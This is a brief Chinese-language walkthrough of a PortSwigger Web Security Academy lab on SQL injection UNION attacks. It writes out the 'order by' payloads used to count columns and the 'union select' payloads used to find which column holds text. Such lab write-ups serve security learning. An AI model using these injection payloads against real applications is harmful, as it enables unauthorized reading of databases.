burpsuite靶场----SQL注入7----确定某个字符串所在列

burpsuite靶场----SQL注入7----确定某个字符串所在列

靶场地址

https://portswigger.net/web-security/sql-injection/union-attacks/lab-find-column-containing-text

正式开始

1.Make the database retrieve the string: 'P4cni8' 说要让数据库检索'P4cni8'
2.点击标签

3.确定列数
' order by 3--没有报错
' order by 4--报错
4.确定所在列
' union select 'P4cni8',NULL,NULL-- 报错
' union select NULL,'P4cni8',NULL-- 成功